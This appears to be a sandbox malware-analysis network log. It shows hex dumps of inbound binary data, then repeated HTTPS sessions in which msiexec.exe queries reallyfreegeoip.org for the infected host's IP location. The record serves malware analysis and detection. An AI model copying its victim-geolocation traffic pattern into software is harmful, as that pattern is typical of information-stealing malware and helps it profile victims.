2025-01-10 23:07:31 UTC	4941	IN	Data Raw: 6b f6 ff 74 e6 b0 84 3d f5 d7 e1 a1 16 79 dc 66 63 6e 0d 4f 55 59 d2 6b 76 81 d8 ef b8 41 94 fc 84 3f 52 11 ef 59 2e 54 ff 3c 57 be e5 97 03 e9 9f 9c 69 ea 7f 3d d9 52 4d b2 dd d7 f5 14 13 65 53 81 13 d1 4a af e0 5e e3 95 0b fe 69 76 f2 8d af d5 ba 4e 20 cd 01 82 d9 eb b0 d5 6f 8c 0b 5c 33 81 23 cc f7 cc 78 2c d6 48 4a f6 f9 90 f7 ae 35 49 34 9c a7 b2 b2 ca ef b1 97 45 d0 8a e0 39 cb 2a cd a5 13 5d 0a c2 32 0d 94 d9 37 98 4d da e1 39 40 31 ad dd ea 15 3d 21 ee a5 c8 72 c5 aa b5 e4 3b cb c0 4d d8 a4 d1 0f 92 18 94 e4 b4 c7 a8 8f 8d 76 ff b8 d7 c1 c3 ee db 44 59 af f6 18 9b d8 07 7b c6 9c d9 d5 9c f4 b9 4d 4f c8 78 66 0d 62 3f d1 31 27 e3 21 b6 80 27 14 b1 e2 75 c9 72 ed 45 15 e5 79 5d 41 36 a2 48 5d 78 6f 98 c3 b1 a1 c1 11 4a 12 21 ab 7c b5 9f a1 51 78 dc Data Ascii: kt=yfcnOUYkvA?RY.T<Wi=RMeSJ^ivN o\3#x,HJ5I4E9*]27M9@1=!r;MvDY{MOxfb?1'!'urEy]A6H]xoJ!\|Qx
2025-01-10 23:07:31 UTC	4819	IN	Data Raw: 1f 15 0e a6 a9 a9 a4 92 a2 0d 0c d7 cc 48 07 c6 06 cd 19 1a 05 de 48 ac 05 92 46 36 a7 90 cd 0b 8d 94 8a b0 c6 1d 8e 96 32 67 f4 fd c9 12 cd e6 3b ca c6 b3 7c e6 9a 9f 28 8f 94 98 26 5a 7c 75 a7 32 55 e4 c6 70 44 d9 c0 d1 df 47 9a 38 0c 73 00 ba e7 e4 d3 a1 cc 62 77 92 88 15 56 bc d3 02 20 30 d0 33 2a 37 37 58 ea 37 7f 16 a4 74 c7 4a e7 c9 98 f6 af ed e5 b0 fb 7a 08 22 82 ea a0 9a d9 0d 0a e9 f9 af 2d 99 be 58 b7 99 ca 32 05 44 db a8 b5 bc a7 bc 37 71 6d 5e 50 02 09 94 7c 7e fa 11 59 ac 0e 36 05 eb 42 85 67 6a d5 af 83 a8 3d 54 e7 ae 28 fe 67 6f ba bf f7 ff 67 ba 87 96 92 a4 25 21 f9 0a ee 6e c0 8e 66 91 29 cc bb f5 dd c7 53 65 ca 9b 5b e0 ec 29 de 04 c8 8e 0d f3 23 d0 90 7e 21 0c 40 ba 9f 95 5a 62 d3 61 bf 57 3c d3 8f 4c 01 6b 36 ce f4 24 ed 87 4d 59 ef Data Ascii: HHF62g;\|(&Z\|u2UpDG8sbwV 03*77X7tJz"-X2D7qm^P\|~Y6Bgj=T(gog%!nf)Se[)#~!@ZbaW<Lk6$MY
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: 5c 3c 0f 5b 5f f8 4a 2a a0 f4 2e f4 88 93 7d 8d 90 16 60 88 8e f2 53 2a 8a a1 95 b2 be 4c a4 7e c1 6b 1e 3a 9a 2f b9 2f ab 58 4c 32 21 37 b0 b2 27 7b 69 88 e0 53 b2 ee 2a e0 47 f9 b6 6b 34 c2 82 f7 d3 2f e0 b5 ec e7 e1 fb 72 4c ef 9b 39 a9 d6 4e 5b 8c 57 5b f6 d7 cf 4e e4 94 5b c6 d1 e8 ab 0c 81 a0 90 1d 2d 6a 3b 12 28 ec 42 0c 60 97 b9 38 c4 1e b0 2a 6e 51 04 c3 80 ae fd db 4d bd a0 1c 88 f2 e5 8c 3a c0 99 10 3e c0 6b 20 89 a3 ff 7f 3d 99 e7 59 3b 6f 13 76 59 28 e5 24 ee 8a 5d 0b eb 44 1f f9 54 ca 8b 8c 62 d2 69 2e 14 2a d7 1e 84 5f 5e c0 e9 e8 30 c4 b2 60 4a 6f 83 a9 0e bb 44 f5 35 c7 0d d5 2f 84 1c e1 01 89 6e 3b 95 e3 b6 79 61 ba 11 32 f4 8c 14 87 a8 2e 12 b7 c0 fb 99 ea 08 32 58 71 a2 fc a4 db 66 db 46 29 55 d6 1a 66 21 3d 4e 0d 8c 0e 4b e2 7b db 00 Data Ascii: \<[_J.}`SL~k://XL2!7'{iSGk4/rL9N[W[N[-j;(B`8nQM:>k =Y;ovY($]DTbi.*_^0`JoD5/n;ya2.2XqfF)Uf!=NK{
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: 2d 44 7d 50 1a 3e e2 7f a2 a6 57 9e 8e 52 1e 1b b4 60 40 24 4a 03 16 d6 16 c1 e9 b1 ea d8 30 7e f6 a9 35 5c 93 61 fd f9 70 4b be 11 2e ba 47 e9 e2 83 0e b4 af c0 24 4e 8c 86 3a d9 25 da d0 c8 73 b2 b5 37 71 17 d5 a4 08 ab 5e 57 ae fe 70 9b 16 0c 6b dd b2 c0 3e bd 0a 13 99 68 59 78 40 bf 50 34 7f 6a d2 41 cb 19 8b c1 d2 22 57 2a bc ad c4 24 2f c9 18 d0 1d df 57 94 d4 be 1d 79 e8 06 b6 43 7f fa e1 91 f3 0c df 79 f3 b6 84 fd 36 69 6b e7 f2 f2 aa 94 a1 90 f2 75 ed 6a d5 91 0a d9 68 1d e8 11 e1 f9 ff 5e 6f b2 cf bc c9 84 6a 5c f1 be c8 bb 1b a6 79 7e 96 6b 5a a9 8b 45 b5 10 a4 bd 64 fe e2 cb 8d 92 1d 91 6a 51 ef 67 bd e3 0c 8c 70 9b 88 de cf a9 37 10 d2 07 5d 7b 9a 5e 30 26 fb b8 ad 70 18 66 73 9f 8c 6c 96 91 85 1d 78 ad 5f 65 bd 87 d1 28 e0 29 97 5a f1 eb 32 Data Ascii: -D}P>WR`@$J0~5\apK.G$N:%s7q^Wpk>hYx@P4jA"W*$/WyCy6ikujh^oj\y~kZEdjQgp7]{^0&pfslx_e()Z2
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: 94 db 4b 9a e6 b5 5a 81 80 ec 5b 44 03 46 57 98 6b 5e 41 6a be 9d ca f5 af c8 7c fd 68 a9 c2 9b 59 d0 ec cc 6d 33 41 03 14 ba 7d b3 88 2c d6 1a c2 36 55 2e 42 0e a5 32 e8 b4 1f ad 5d 8f 44 f8 c9 0e e8 68 5e 6a d2 48 d2 90 13 09 b4 21 f6 c3 35 4c 68 34 d5 82 89 8b 6d 2a 91 7e 31 45 bf a1 98 12 57 a0 3d 30 28 22 f2 cd 64 9d a9 32 33 d4 c7 a6 60 4e e3 b5 81 3b f3 b7 d1 49 a5 f3 54 e7 bd 69 fe 96 83 2c 8d 17 d5 ba 30 15 cd 01 86 eb 88 b2 d5 1f 9a 23 dd 33 81 29 da 09 cd 6b 27 c7 43 73 3d f8 90 f7 d0 1e 49 34 98 8f 59 b2 ca e5 a2 9b 3b 66 8a e0 3d b7 a2 66 ab 63 ff 2b 8e 13 b5 9f 83 04 b8 0a bf 99 47 59 98 df b2 8d 71 74 3a ce c6 a3 1c 8b c5 cd c4 59 86 97 3f ad c0 f1 18 d7 38 d0 af cf 33 c5 e0 e3 00 df c7 73 da e7 9e a5 69 59 af f2 6a 64 8c 07 0b 9b 93 f2 00 Data Ascii: KZ[DFWk^Aj\|hYm3A},6U.B2]Dh^jH!5Lh4m*~1EW=0("d23`N;ITi,0#3)k'Cs=I4Y;f=fc+GYqt:Y?83siYjd
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: e2 c8 9e 9d 07 7a a2 b0 da d5 4f 03 9e 3b 4f b8 6f eb 0e 62 3f d0 f4 31 9f 64 bd 81 73 3c b5 c6 71 cf 1d 40 45 15 ef 0b d0 54 58 91 64 06 78 4f 92 bd fa c1 c5 15 62 58 61 ab 76 eb 80 a1 51 7e f4 c5 8d 89 66 18 07 b9 ba a5 11 fb 62 5f 9d 63 9d 1b 49 82 4b 1a 92 32 fe 55 78 8a 4d 52 fb 82 ad 27 ea 81 e5 8e 0b c2 19 1f 15 cc 6a ca 6e 03 ed 61 68 de 92 77 9d e5 b5 41 5e 7c ba da fd a0 09 78 c9 80 04 27 2c bc f4 0a 2e ca 27 cc 52 b6 10 05 a7 7c 43 ee 16 78 08 96 08 dd d8 c5 f6 7f 83 1a bd 54 63 12 64 9a 7d 7c d5 2e 6b 12 e7 e5 ad cb 7e a2 0d 06 2f e9 54 75 5c 13 cd 69 29 2c ab 48 a2 0f fd 1a 36 a7 9a c0 01 84 1a e3 77 a8 a3 8e 8d 38 67 f4 3d a7 ad cd e8 31 d9 c2 a2 78 ef 8c 96 a6 e6 fb c7 26 5a 76 a2 b7 36 3a 96 c7 70 4e c9 b2 8b de 02 ea b8 24 68 30 bd 39 5b Data Ascii: zO;Oob?1ds<q@ETXdxObXavQ~fb_cIK2UxMR'jnahwA^\|x',.'R\|CxTcd}\|.k~/Tu\i),H6w8g=1x&Zv6:pN$h09[
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: df 02 9b 1d 1b 1a 02 b5 e7 25 fb e0 cc 71 71 30 bc 02 28 d1 b0 02 24 98 fe 2c 70 3c 25 58 90 1c 50 4a a4 72 6f 00 9a b7 de fc af ee 58 85 6c 57 75 30 83 f5 67 bf c2 1c 87 ae fe c0 4a bc a8 20 4f e6 ad 42 a7 6b a3 e8 01 bc ad ba 95 27 1c 2c a7 1d 1a e0 de 4a e7 31 fa df 64 3c a7 c4 4b f2 be 69 d0 ac 4a 80 48 5e f4 a2 9b d0 10 00 d6 b5 e4 eb 15 5b 9f 96 f3 dc 16 29 e8 08 a9 26 c0 8e 66 e3 d8 ce bf ea 98 85 53 6f c1 54 4b f1 e9 04 b6 0c d9 8d 62 2f a2 d1 9a 7e d8 fa 7a ba 8e 9b 65 75 c2 4d b2 56 3c d9 5b 4c dd 62 1e a0 8a 10 e7 8d 97 27 8c 92 16 1a 43 f8 75 53 2a 80 b7 6b cd 9f 6c b5 5a 8a db 1c 3a ea 11 cb ae ab 52 5b a9 9f 36 a3 b5 13 6b 22 ca f7 53 c2 32 20 f7 6f 49 c4 5a 3c 60 d7 f9 89 5d ef b5 96 53 3a e3 1f 73 fe 9c 04 3b f2 54 29 9b 53 a5 80 48 ea 55 Data Ascii: %qq0($,p<%XPJroXlWu0gJ OBk',J1d<KiJH^[)&fSoTKb/~zeuMV<[Lb'CuS*klZ:R[6k"S2 oIZ<`]S:s;T)SHU
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: d6 5d 5e 9d 46 9c 3a e8 cf 4e 9c c8 9b c6 d5 90 b2 cf 81 d0 8c 35 df a8 3b 18 34 01 4b 0e 6e f8 85 01 f4 1b c3 e9 6e 45 f0 aa 79 ae fd d7 3e 6c a8 73 47 da 24 86 44 f7 99 63 f8 af ad 2a 9a ae ee 69 4b d1 18 49 3f 6c f8 c2 59 22 80 92 fb 9b 57 7b d2 18 70 3c 5e a5 46 f2 5f d8 69 3b 73 f1 5a 5e 8e 5f 4e e2 8d 65 f9 cb c2 38 5c 4a 94 8b c8 ae 55 ff e7 ca 4e a7 dc 81 73 56 a3 ac 7d 45 bc e4 ab f0 83 9f 0b 41 c6 8a 66 56 1c 0b 79 6b cf ec b1 5a aa 17 4e a1 a2 f4 d6 58 cb f3 43 8b 70 c5 0b 96 21 3d 40 af d7 28 39 c9 7c a8 b9 a9 bb 95 26 2d 3a af e9 a2 01 56 70 9e d6 64 e8 58 99 ef 7a 15 63 b1 d5 35 5c 93 c3 a6 dd 02 b8 b5 62 97 18 62 fa 8f b3 70 85 ab 62 05 26 9d af 39 a9 43 50 79 bd 73 b8 a9 da 52 12 f4 c3 01 87 58 46 86 e9 13 51 16 24 16 dd b2 e1 35 bd 65 24 Data Ascii: ]^F:N5;4KnnEy>lsG$Dc*iKI?lY"W{p<^F_i;sZ^_Ne8\JUNsV}EAfVykZNXCp!=@(9\|&-:VpdXzc5\bbpb&9CPysRXFQ$5e$
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: 33 3c 6e 2e bd ca 4e 1f 51 35 e7 50 5d 69 65 6f f2 3d 0d 31 af 5e bb bb a7 9c 9b 22 5d 33 8e 99 92 12 2f c9 16 f8 03 df 5b 92 d4 48 7a 5c c0 38 b6 43 0b d6 c2 91 df 7f fd 0b 26 7f 84 8d 48 76 15 d0 f6 da e7 e6 c2 98 e3 26 85 02 54 91 0e fb 40 e3 e9 04 c5 36 cb 57 1b 9b 42 fc c3 97 4f 79 cf ae 11 b4 11 08 db 5b 81 43 90 9e 8b 4f 13 47 df cd 97 81 f4 93 ae b7 04 e5 44 af ee 70 3a d7 33 d2 3b 96 05 ee 6d 8c 2d 4b ee 75 fc 69 38 0b 8e 71 c9 80 19 00 ba 44 a4 ba 94 14 76 bb fb 2c da 88 42 69 24 94 d1 5c 30 bd 9e 28 aa 87 9e 48 e4 26 2d 3f 90 ea 5e 45 c2 8d 7f b9 4b b0 d9 05 73 4c cd ca 8c 3c 09 ca b2 26 33 41 2c 6d 1b 7f bb ee 31 e5 0d c2 4c 3a 82 53 06 d1 1f cf b4 1b af 96 8f 44 b3 32 c2 e8 6a 54 6a c3 b3 ac aa 13 1c b0 5f cd cb 34 48 1b 84 d5 82 83 e4 a0 2a Data Ascii: 3<n.NQ5P]ieo=1^"]3/[Hz\8C&Hv&T@6WBOy[COGDp:3;m-Kui8qDv,Bi$\0(H&-?^EKsL<&3A,m1L:SD2jTj_4H*
2025-01-10 23:07:31 UTC	1390	IN	Data Raw: 35 4c 65 b3 d5 82 87 97 1c 2a 91 7e 5e 99 b7 b0 94 7d 88 b1 2c 36 47 fd f4 a2 a1 9d b8 34 5c 33 a3 a6 6a 48 3d 7b b4 36 ef 83 d1 43 bc f3 5e cf f7 0b fe 9c 57 f2 8d 17 d5 ba 4e 5e f8 01 82 9d 99 d3 d7 6f fc 1d 74 b2 81 23 c6 e1 32 79 3f c2 59 5e cf 02 91 f7 ae 28 c4 74 9c a7 b3 97 dc 9d 10 81 45 20 28 c5 2e ed 81 77 ab 19 4b 26 17 61 46 9a 95 8a 1b 3c ab f6 72 60 41 db 10 a8 7d 2e 67 cd c6 d9 be 8e de bf e4 59 ae e4 9d 88 d6 83 cb ea 38 a0 09 cf 92 c5 e0 e3 00 c4 cb ec cb e7 ea a9 d3 48 af 86 0e e3 1c 07 7b 80 8b 24 d4 56 67 38 3d 76 1e 78 66 0d 74 17 a7 d1 27 eb 20 9d 81 7b 14 b1 ee 06 c9 72 f3 45 04 f0 51 89 41 58 eb 5f 4a 0a e6 89 c3 c1 bf e8 11 4a 16 13 04 6d 95 ef b0 46 52 09 8f 8d 83 7f a2 61 6c bf 8d db d3 34 55 e9 ea 8e 02 59 97 39 10 e8 c7 9e 3a Data Ascii: 5Le*~^},6G4\3jH={6C^WN^ot#2y?Y^(tE (.wK&aF<r`A}.gY8H{$Vg8=vxft' {rEQAX_JJmFRal4UY9:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49981	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:07:34 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865243 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rL3zTFPnT7SMelvEPGN5mOEgPMbCD%2B9xSpwU%2BCbZys98bbKfSYur2nkt4vlBoaZx5ttRzKjmpCWtqZNoHtU4YfO8bFdeSVe8H4la%2BaJXeSpCUsHvIJWeB5tLA9XQO%2FLY7p15vf1D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900052f4b9848ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1817&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1593886&cwnd=215&unsent_bytes=0&cid=1957a84cde6790e7&ts=254&x=0"
2025-01-10 23:07:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49982	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:35 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:35 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865244 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEahyY6BxutxFPUMY%2FNmwnuunHmh0ggkOTTMtY0rB3T1xN5Z06YX9zWEJPHrFybZ%2FfjSw4Q6%2F0KyJ9lvMzt%2BnaZ31H%2F4BdLxHjcsQT%2FBjoPpZ1bZyilvkIyVQiIXyOLOjMhIlIhH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900052fa1f697293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=1911&rtt_var=1544&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=559279&cwnd=158&unsent_bytes=0&cid=98c27387cd59964d&ts=162&x=0"
2025-01-10 23:07:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49984	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:36 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865245 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqquSS2LgPItVaz4Vzvh%2F25Qe%2FEUgm3PThNgv1jWJxm4rlsLxJDzGEKlTf8IRv61PXz%2BC5gKIlFpRtswmkVhFZXAh2NXIuzdeT8pcXCFAARODH82TSGIqV9nxAYEVkG5dZ6rK9%2Fv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900053029ea941ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1695&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1622222&cwnd=192&unsent_bytes=0&cid=68a5447df9c103de&ts=156&x=0"
2025-01-10 23:07:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49986	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:38 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865247 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1f4CiN8M7rD8bV8BVBM%2Be%2BN8c37p1lJ0vkhNW%2ByQeR7ZuOU9lvP1Ol4D%2FlMdY31mEUJ4vwsQKaT6nrVMf6TZCVSk2Hz5CXtvx9mmEZDWrZf5Ss9QmcjoBxuGsBWEnUlfmrz5hNK3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000530b4dae8ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1815&rtt_var=687&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1584373&cwnd=215&unsent_bytes=0&cid=7a86bc9c7dde6808&ts=141&x=0"
2025-01-10 23:07:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49988	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:39 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:39 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865248 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNPi9ytozKv%2FZrIon483080GA979XwYBhGbMZN0KBI3r%2FpsWPjEoXcBdDQRGWLJHfMC42CcdyP3bDoYSs9d1DKJA0ov44au3nfJI3qMMaLF8a38OgSwSQuK2VQE0hHxKE%2BOXz4fr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900053137a4b1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1607&rtt_var=942&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=985155&cwnd=153&unsent_bytes=0&cid=ce069b2e5c687978&ts=137&x=0"
2025-01-10 23:07:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New 